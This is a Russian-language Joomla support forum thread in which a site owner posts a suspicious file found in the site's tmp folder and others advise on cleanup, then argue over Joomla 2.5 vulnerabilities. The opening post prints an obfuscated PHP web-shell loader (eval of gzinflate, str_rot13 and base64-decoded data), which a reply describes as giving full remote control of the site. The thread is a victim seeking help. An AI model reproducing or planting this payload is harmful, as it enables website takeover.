Форум русской поддержки Joomla!® CMS
05.12.2016, 00:25:56 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2 3  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Вирус в папке tmp.

 (Прочитано 2275 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Elimelech
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 77


« : 26.06.2015, 14:59:56 »

Есть сайт на Joomla 2.5.28. Вчера заметил, что в папке tmp появились файлы типа: 20150623063130libs.php.vob со следующим содержанием:
Код:
<?php
set_time_limit(0);
error_reporting(0);

eval(gzinflate(str_rot13(base64_decode('vUl6QuNTEP5cJP7Dso3kUQcJL089AU6ExIHo8tbYdoUATI69VvbiN63XYyniv2pzeifxZGNDnRohkew8z8wz45kdMyFPbgkWhU/yYEner5xhYvEpKe/wOHOyXLIM3TA6g/6tNrG/2gvtvkX57XZ7q/TAcC6dMAkkqZN9IJUe2QS+Im70lz66pdemObSuB4ZW79HMg68F81X/ZqwbpjUeaEXAJGeXgKCmLXNZEpdY5icLOyBqAfpTBxRksT1y/r7LAHvBA2EBuKzhoeWHLtNJCayAFfJHipmTCC6X4N91tGirN3Xp4GDQYdPT5+0t5sXsDUcfQCo0ExETaIg4D3A5TAa2z8qrlLT0v9V1tVNDpyx2tpChACevkVNtYmDqGyTf5l6ZLpLAVoLZ8eHxxdKeh27VCX26WKgqE92l12nMPWWJzwRXNJcyOqnV8jpOxfJH7oLOkBhZPDAUkXJjFxA47YA4B8TBZK6TrgVZE8/z7RlqDv+4mOHR/6jgctcB8wAM61T1AvHpk21TfE3OO/dXN2I1xwsDhl2LWhuHiWPYcxt3U2bUGZpJu9PV+42erqlJZ0wsOamvRK1OZtzT+6Y1GgxZ7b5XeEiPQuJ3NI+wJwVYH3fqf5ekDiqp4F/YsCfYsOSyIfq6+HbfArhfwDrzkNAzyaXHztPzs03663kiztV5uba0FwlB4WPwtz7SW+TyhrTH3WGvZNV2kuag1xv3O+bNBvgQ0YLZMLxGweI5kW7oxcS41rtdg7TNIXYOG329WFOtIek1oM6jDfYRsptuIHpUkobr84Dc9ED6l2S/Oe5fTvsjOJM+BRyJ+T+sflWc0IO+mWsJqj+n1cxflZ7VJqt8XuUJ5hZ1h+/kvYhq9EHi75/VJ+Pmz6tVLsGhlcB81HaZSaFYLDiA1pLqsFyp0sp7cIyBAEhZuFtKnvwlfAUPqxBIV3N44+x741RmGnD/UECKE24ldxoqUjdGuNAkDwMSPU8wguPoPLrpxejgRDq8paQeWCGiMC6jfUqrdndplXYHeh4LlKmyaoAGwXEiAoInSADnRvG0ZK4uhuz8VCHu7j4SA9CvB8kCbsk0KJnwiY/3PkdtiJuQ2KoGaFfP3y51M/R9O2PzAp7xIFckkcuI1alx3yQlS+M6aHyXFq1TMvH52p76oeTBhtbF3wvA10PZuWlNR8rgASkXfuJWHtlPKtweaW2uPEIHs/lWCuPIC3qXtLnHRxo1Ub/Ic85dlwWZ2jjVXgBZgZ+ZsTfxJ81vfkG9vamizx4V+4R5itjwj9VZ2QfHTJyAPeIXVxzPjuO6tAuER3FzoxO5qnqaY6G8G9sIK2mrpeR8HyWK4WVcjNFtBmlXV1TOyeQA6VYZ1P7ChXLcd2xWtHvAKZDqUD98YEnqnbkWAso/pFU/skUaLK2VmqoKk4n5Ja4w2/QeybsCXiiYi/fCM1aXGCnYjcRkSxzDMoE75XtqY2yl9h1PQsmzGrkXlc46Py81DIqqW3P0XbXps7stEnmzjY7yNtpKH7ix4znzPIt9cEEZPamrLe2kGmV24X4pvn/4eAlupm56+K8Swjc1rIr5Ia8aee09z9ZeZPzy1cqdrDMLppAZtoKl9hawbmLFsMaqtfQPIXyWCBtiEfXeR8mTSmcM8i8=')))); ?>


Как от появился этот вирус в этой папке. Что делать, чтобы запретить его появление в будущем?
Спасибо за ответ!
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #1 : 26.06.2015, 15:20:21 »

Удалите все содержимое этой папки, положите в нее пустой index.html и проверьте весь сайт антивирусом и Ai-bilit.

Но в идеале у вас два решения: заплатить специалисту за аналитику вашего сайта и чистку от вирусни или заплатить специалисту и мигрировать на Joomla 3.
Записан
Elimelech
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 77


« Ответ #2 : 26.06.2015, 15:27:46 »

спасибо за советы
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #3 : 26.06.2015, 15:39:40 »

Прислушайтесь к ним. Ибо если сайт посещаемый, взломы будут продолжаться, так как версия 2.5 не поддерживается и имеет ряд известных уязвимостей. Кроме того, вы можете использовать бажные компоненты, так же старые и более неподдерживаемые.

Прежде, чем делать самостоятельно чистку, нужно знать о том, какие виды уязвимостей бывают и как они выглядят. Прогон через программу всех дырок может и не выявить, а уж тем более не залатает их. Специалист вам поможет, но и он не является панацеей.

Миграция позволит избавиться от всех вирусов + позволит поддерживать Joomla в актуальном состоянии.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2651


step by step


« Ответ #4 : 26.06.2015, 15:57:30 »

Смотреть логи доступа хостинга, и искать шелл, с помощью которого и залили этот файл в папку.
Для начала можно и закрыть доступ, установив права 000 на /tmp
Записан
Elimelech
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 77


« Ответ #5 : 26.06.2015, 16:19:57 »

Смотреть логи доступа хостинга, и искать шелл, с помощью которого и залили этот файл в папку.
Для начала можно и закрыть доступ, установив права 000 на /tmp
логи хостинга я точно не посмотрю, так как это не мой хостинг. Поставил права на папку tmp - 705
« Последнее редактирование: 26.06.2015, 16:23:14 от Elimelech » Записан
Elimelech
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 77


« Ответ #6 : 26.06.2015, 16:20:54 »

Прислушайтесь к ним. Ибо если сайт посещаемый, взломы будут продолжаться, так как версия 2.5 не поддерживается и имеет ряд известных уязвимостей. Кроме того, вы можете использовать бажные компоненты, так же старые и более неподдерживаемые.

Прежде, чем делать самостоятельно чистку, нужно знать о том, какие виды уязвимостей бывают и как они выглядят. Прогон через программу всех дырок может и не выявить, а уж тем более не залатает их. Специалист вам поможет, но и он не является панацеей.

Миграция позволит избавиться от всех вирусов + позволит поддерживать Joomla в актуальном состоянии.
да уж, озаачи меня. Короче пока буду так, а если сильно взломают, тогда и перейду на новую версию, за одно и полностью переделаю дизайн сайта.  Денег нету платить специалисту, а самому делать много времени надо. Да и много материала на сайте...
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #7 : 26.06.2015, 17:41:31 »

да уж, озаачи меня...а если сильно взломают, тогда и перейду на новую версию...
Ну, хозяин-барин. Но лучше живой хозяин, чем мертвый барин. Если поисковики вас заблокируют, будет непросто отыграть позиции назад. Или хостер заблокирует, опять начнуться пляски с бубном... Так что копите на специалиста или изучайте вопрос миграции - там не так сложно и это единственное, что вы сможете попробовать сделать самостоятельно.
Записан
ecolora
Живу я здесь
******

Репутация: +170/-2
Offline Offline

Пол: Мужской
Сообщений: 1430


творец


« Ответ #8 : 26.06.2015, 18:17:21 »

Прислушайтесь к ним. Ибо если сайт посещаемый, взломы будут продолжаться, так как версия 2.5 не поддерживается и имеет ряд известных уязвимостей.
Можно полюбопытствовать: каких именно уязвимостей? О них еще кому-то кроме Вас известно? Я имею в виду стандартную сборку последней версии ветки 2.5, без сторонних компонентов и модификаций.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #9 : 26.06.2015, 18:20:03 »

Положите в /tmp файлик с содержимым:
Цитировать
deny from all
но по сути раз залились в эту папку, значит смогут залиться и в другую...
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #10 : 26.06.2015, 18:25:11 »

да вы фигню какую-то пишите, скорее всего или хост уязвим или у вас в папках сайта вирус, который или обновляет(добавляет) в папку что-то или ещё что-то мутит.
тут права ничего не сделают, не может со стороны при норм.движке и хосте такое быть.

ТС 1-проверьте всё на вирусы.
2-вспомните(или посмотрите по ID) что вы последнее ставили и особенно вспомните, с чего и когда началось
3-бекап системы, если дату вспомните и бекап есть(хост 30 дней хранит)
4.самое главное-не качайте варез, а если качаете, не просто "работает, ну и хорошо", а проверяйте все файлы!
ну и 5, если найдёте причину-тут уже ветка событий расширенна!
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #11 : 26.06.2015, 19:56:27 »

да вы фигню какую-то пишите, скорее всего или хост уязвим или у вас в папках сайта вирус, который или обновляет(добавляет) в папку что-то или ещё что-то мутит
Вот код того, что ТС привел в первом посте. Даже при беглом просмотре видно, что это и для каких целей. Даже форму стилизовали ))

Показать текстовый блок

С помощью этой штуки извне можно получить полный контроль над сайтом и базой.

P.S. Вот вам тема с блокбастером, почитайте.
« Последнее редактирование: 26.06.2015, 20:12:24 от SeBun » Записан
ecolora
Живу я здесь
******

Репутация: +170/-2
Offline Offline

Пол: Мужской
Сообщений: 1430


творец


« Ответ #12 : 26.06.2015, 20:14:27 »

Коллега, Вы мой вопрос сознательно проигнорировали? Нечего ответить? Вы о чем писали тут:
Цитировать
версия 2.5 имеет ряд известных уязвимостей.
Лично мне не известно о таких уязвимостях в Joomla 2.5 применительно к данной теме (что всем надо срочно обновляться до 3 ветки).
И многим, думаю, было бы интересно о них узнать. А то многие тут сидят еще на 2.5.28 и ничего...
Либо я не знаю, либо Вы не знаете, о чем пишете - одно из двух.
Так о чем речь все-таки? Azn О каких таких известных уязвимостях?
« Последнее редактирование: 26.06.2015, 20:18:43 от ecolora » Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #13 : 26.06.2015, 20:56:42 »

Коллега, Вы мой вопрос сознательно проигнорировали? Нечего ответить? Вы о чем писали тут:Лично мне не известно о таких уязвимостях в Joomla 2.5 применительно к данной теме (что всем надо срочно обновляться до 3 ветки).
И многим, думаю, было бы интересно о них узнать. А то многие тут сидят еще на 2.5.28 и ничего...
Либо я не знаю, либо Вы не знаете, о чем пишете - одно из двух.
Так о чем речь все-таки? Azn О каких таких известных уязвимостях?
Кому было бы интересно, уже вкурсе, а кому не интересно, уже выгребают шелы со своих движков, в качестве примера http://joomlaforum.ru/index.php/topic,304248.msg1511130.html#msg1511130 а за дольней шим лезте на баг трек


P.S:Вот тут можно отслеживать самую горячию инфу по уязвимостям в Сore http://developer.joomla.org/security-centre.html
« Последнее редактирование: 26.06.2015, 23:21:47 от winstrool » Записан
capricorn
Живу я здесь
******

Репутация: +86/-0
Offline Offline

Сообщений: 1409


« Ответ #14 : 26.06.2015, 21:53:18 »

Цитировать
20150623063130libs.php.vob

если это время создания файла, то можно глянуть логи по горячим следам.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #15 : 27.06.2015, 01:23:44 »

Видимо тоже не в теме.
@winstrool  & @SeBun если взломаете версию 2.5.28 Grin поделитесь эксплойтом Wink
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #16 : 27.06.2015, 01:35:08 »

Видимо тоже не в теме.
@winstrool  & @SeBun если взломаете версию 2.5.28 Grin поделитесь эксплойтом Wink
Такими вещами не делятся)), и стоят несколько $$, так что не выгодно, могу акибу продать, но она тебе нахер не нужна  Grin
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #17 : 27.06.2015, 01:44:54 »

дешевле найти, точнее узнать расширения, найти уязвивость и бой))) Roll Eyes
а потом суппорту расширения, мол я взломал, дайте бабло, покажу как.
и ждём обнову новую расширения  Grin
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #18 : 27.06.2015, 01:53:33 »

дешевле найти, точнее узнать расширения, найти уязвивость и бой))) Roll Eyes
а потом суппорту расширения, мол я взломал, дайте бабло, покажу как.
и ждём обнову новую расширения  Grin
Не однократно находились баги на таких порталах как VK, mail, yandex больше 100$ не дают, редко чуть больше, а при монетизации можно выручить в десятки раз больше...
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #19 : 27.06.2015, 01:56:01 »

а вы потихоньку по 100$ собирайте и подготавливайтесь к монетизации  Grin
Записан
ecolora
Живу я здесь
******

Репутация: +170/-2
Offline Offline

Пол: Мужской
Сообщений: 1430


творец


« Ответ #20 : 27.06.2015, 07:06:44 »

Кому было бы интересно, уже вкурсе, а кому не интересно, уже выгребают шелы со своих движков...
Короче пустая болтовня для придания себе значимости.
Цитата: из_к/ф_Гараж
— Я лично все деньги потратила на научные книги.
— Да?! А кассетный магнитофон кто привёз?
— Вы его видели?
— Видела!
— Вы его слышали?
— Слышала!
— Вы его включали?
— Да!
Azn
« Последнее редактирование: 27.06.2015, 08:56:11 от ecolora » Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #21 : 27.06.2015, 08:49:24 »

ecolora прав,почти как обычно)
(с)=Кто как хочет, так и дро.......А я дро...., как я хочу.
***
По делу-я попробовал написать ответ(точнее написал), но потом тему в флейм перевели(сделали), ну и продолжил.
***
ecolora, только чото в цитату я не въехал...или фильм не смотрел....наверно не проснулся ещё или юмор не для моего серого в-ства.
« Последнее редактирование: 27.06.2015, 09:46:59 от vipiusss » Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #22 : 27.06.2015, 16:30:47 »

Такими вещами не делятся)), и стоят несколько $$, так что не выгодно, могу акибу продать, но она тебе нахер не нужна  Grin
Ценовой политикой владею, вот только нету в 2.5.28 той уязвимости, как раз в ней её закрыли.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #23 : 27.06.2015, 16:48:54 »

Коллега, Вы мой вопрос сознательно проигнорировали? Нечего ответить? Вы о чем писали тут:Лично мне не известно о таких уязвимостях в Joomla 2.5 применительно к данной теме (что всем надо срочно обновляться до 3 ветки).
И многим, думаю, было бы интересно о них узнать. А то многие тут сидят еще на 2.5.28 и ничего...
Начну с конца. Во первых, не у всех стоит 2.5.28, многие сидят еще на 1.5, а некоторые и на 1.0. Посему я им однозначно советую обновиться на 3.4, что бы поддерживать систему в актуальном состоянии. Вам, конечно, известно, что основная доля взломов приходится не на ядро, а на кривые компоненты, установленные в системе. Взять того же Акебу, через который можно свободно залить шелл (я знаю точно, что в нем есть дырка в версии для 2.5). А Акеба стоит на каждом втором сайте. Делайте выводы. В ядре 2.5.28 исправлено более 20 ошибок от версии 2.5.27, больше их там никто не искал, эту версию прекратили поддерживать. А кому надо нашли еще кучу уязвимостей плюс юзают дырки от предыдущих релизов, о которых широкой публике неизвестно, winstrool об этом вам правильно сказал, на этом зарабатывают деньги и делиться не будут. Ну и чисто технический момент: поскольку ветка не поддерживается, кто потом будет ошибки исправлять, даже если о них станет известно? Сообщество любителей 2.5? Не лучше ли перейти на 3.4 и получать обновления в штатном режиме? Имхо.
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #24 : 27.06.2015, 17:37:45 »

вот чего вы развели..... вы уверены, что тема вас достойна?....я отвечаю, ради флуда в теме, но вы же можете понять смысл?
Записан
ecolora
Живу я здесь
******

Репутация: +170/-2
Offline Offline

Пол: Мужской
Сообщений: 1430


творец


« Ответ #25 : 27.06.2015, 20:21:34 »

Начну с конца...
Ну так Вы же написали совсем о другом изначально. Вам обрисовали версию 2.5.28, Вы написали о каких-то "известных" (только Вам уязвимостях)? Я же не спорю с тем, что Вы сказали только что, а вот изначально было путое....
Так что не пишите. если не знаете. Чтобы не выглядеть глупо.
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #26 : 27.06.2015, 20:24:26 »

это вы кому?Сергею? Shocked
Показать текстовый блок
***
моё предложение, давайте прекратим в теме меряться.... и не спорить, а то чувствую спор на личное перейдет.
а это никому не нужно!
« Последнее редактирование: 27.06.2015, 20:29:13 от vipiusss » Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2272



« Ответ #27 : 28.06.2015, 00:09:18 »

...и не спорить, а то чувствую спор на личное перейдет.
а это никому не нужно!
Не перейдет. Я прекрасно знаю, кто такой ecolora, хоть и не пересекались доселе. Каждый вертится в своей области, у каждого свои данные и знания. И он со мной не спорит, как и я с ним. Кроме одного вопроса - наличие уязвимостей в 2.5.28. Он считает, что их нет. Товарищ winstrool, который является авторитетным жителем Античата с 2007 года (а с 2013-го стал известен и на этом сайте) и знает об уязвимостях не по наслышке, уже все сказал, мне добавить нечего. Даже на "выглядеть глупо". Все, закрыли тему.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #28 : 28.06.2015, 00:58:14 »

если взломаете версию 2.5.28 Grin поделитесь эксплойтом Wink
ищи в теме!
http://developer.joomla.org/security-centre.html
?limitstart=0

[20140902] - Core - Unauthorised Logins
Versions: 2.5.24 and earlier 2.5.x versions, 3.2.4 and earlier 3.x versions, 3.3.0 through 3.3.3

При использование техники СИ
[20140303] - Core - XSS Vulnerability
Versions: 2.5.18 and earlier 2.5.x versions, 3.2.2 and earlier 3.x versions

опять же:
[20140304] - Core - Unauthorised Logins
Versions: 2.5.18 and earlier 2.5.x versions, 3.2.2 and earlier 3.x versions

тут парочку пропущу оналогичных...
....
________________

вот еще интиресная:
[20130801] - Core - Unauthorised Uploads
Versions: 2.5.13 and earlier 2.5.x versions. 3.1.4 and earlier 3.x versions.

P.S: flyingspook если вы не поподали под раздачу или ваши заказчики на версии joomla 2.5.28, это не значит, что она не уязвима, Уязвимо все, дело времени опыта и техники...
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #29 : 28.06.2015, 12:16:57 »

на версии joomla 2.5.28, это не значит, что она не уязвима, Уязвимо все, дело времени опыта и техники...
Из этого следует что, те версии что еще и не выпустили тоже уязвимы.  Wink
По существу Вы так и ни чего не сказали про заключительную линейки 2.5 именно версию 2.5.28.
Как взломаете её так расскажете и разработчику тоже в баг трекер киньте информацию. Воздух не разгоняйте.
Давайте не разводить в топиках флуд и писать по существу. Время советов тупого мигрирования прошло 3 года назад, и если предлагать, то при анализе сайта при работе над чисткой и устранением, и только если это неизбежно.
Сайтов множество который работают и на 1.0 и на 1.5 и на 2.5 и с ними все нормально и это из опыта не из "пустозвонства". Движок ни как не относится к сторонним расширениям.
Если разработчики сейчас намерено делают уязвимые места для себя(и по просьбе) и потом их находит общество и тогда узнав разработчики их сами и закрывают, то где гарантия что они их просто не переносят в другое место. Все уязвимые места ищут сейчас при помощи ПО которое в доступе для всех типа "хакеров". Сами же профи уже давно управляют цифровым миром, угоняют самолеты, и ломают военные структуры, и ни кому из них не придет в голову ломать CMS и монитизировать трафик, это удел школоты.

P.s. давайте не разводить флуд, и писать по существу, помогая ТС, и не пугая остальных разным "бредом", тему читают много народу и у многих может возникнуть вопрос после прочтения, а информация окажется не достоверной
Записан
Страниц: [1] 2 3  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet